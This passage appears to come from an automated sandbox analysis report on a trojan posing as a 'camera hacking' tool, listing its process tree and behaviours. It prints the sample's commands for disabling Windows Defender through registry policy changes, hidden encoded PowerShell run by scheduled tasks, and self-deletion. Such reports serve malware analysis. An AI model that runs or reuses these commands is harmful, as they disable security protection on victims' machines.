wrote to memory of 3448 4036 is-LA33S.tmp FileDate329.exe PID 4036 wrote to memory of 3448 4036 is-LA33S.tmp FileDate329.exe PID 2444 wrote to memory of 32 2444 net.exe net1.exe PID 2444 wrote to memory of 32 2444 net.exe net1.exe PID 2444 wrote to memory of 32 2444 net.exe net1.exe PID 2144 wrote to memory of 2396 2144 IC329.exe 9nx2u.exe PID 2144 wrote to memory of 2396 2144 IC329.exe 9nx2u.exe PID 2144 wrote to memory of 2396 2144 IC329.exe 9nx2u.exe PID 2396 wrote to memory of 2236 2396 9nx2u.exe is-GRU8E.tmp PID 2396 wrote to memory of 2236 2396 9nx2u.exe is-GRU8E.tmp PID 2396 wrote to memory of 2236 2396 9nx2u.exe is-GRU8E.tmp PID 3124 wrote to memory of 2024 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 3124 wrote to memory of 2024 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 3124 wrote to memory of 2024 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 3124 wrote to memory of 4708 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 3124 wrote to memory of 4708 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 3124 wrote to memory of 4708 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe PID 2236 wrote to memory of 4952 2236 is-GRU8E.tmp SyncBackupShell.exe PID 2236 wrote to memory of 4952 2236 is-GRU8E.tmp SyncBackupShell.exe PID 2236 wrote to memory of 4952 2236 is-GRU8E.tmp SyncBackupShell.exe PID 2024 wrote to memory of 3684 2024 WerFault.exe cmd.exe PID 2024 wrote to memory of 3684 2024 WerFault.exe cmd.exe PID 2024 wrote to memory of 3684 2024 WerFault.exe cmd.exe PID 4708 wrote to memory of 4856 4708 WerFault.exe WerFault.exe PID 4708 wrote to memory of 4856 4708 WerFault.exe WerFault.exe PID 4708 wrote to memory of 4856 4708 WerFault.exe WerFault.exe PID 4856 wrote to memory of 3140 4856 WerFault.exe reg.exe PID 4856 wrote to memory of 3140 4856 WerFault.exe reg.exe PID 4856 wrote to memory of 3140 4856 WerFault.exe reg.exe PID 3684 wrote to memory of 3040 3684 cmd.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe"C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp"C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp" /SL4 $80050 "C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe" 4446082 532482⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 233⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 234⤵
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 8884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 10404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1404⤵
- Program crash
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe" 72aafdade9cba069152144844a0d25e03⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 8524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 8604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 8724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 8804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 11324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 11724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 12164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 11924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 12004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 9524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 11444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 9724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 11204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 18084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 20124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 20124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 19964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exeC:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe /m SUB=72aafdade9cba069152144844a0d25e04⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp"C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp" /SL4 $303AC "C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe" 1559217 52736 /m SUB=72aafdade9cba069152144844a0d25e05⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe"C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" /m SUB=72aafdade9cba069152144844a0d25e06⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate329.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exeC:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe /S /site_id=6906894⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOonaGCFB" /SC once /ST 11:24:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOonaGCFB"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOonaGCFB"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 21:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe\" DF /site_id 690689 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 13444⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exeC:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp"C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp" /SL4 $203F2 "C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe" 1906126 517125⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 12484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 12484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 19364⤵
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 20044⤵
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 19724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 16484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 17044⤵
- Program crash
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause ImageComparer3293⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause ImageComparer3294⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4668 -ip 46681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 46681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4668 -ip 46681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4668 -ip 46681⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 21441⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 21441⤵
-
C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe"C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe"1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "FileDate329.exe" /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 21441⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2144 -ip 21441⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 21441⤵
-
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exeC:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe DF /site_id 690689 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
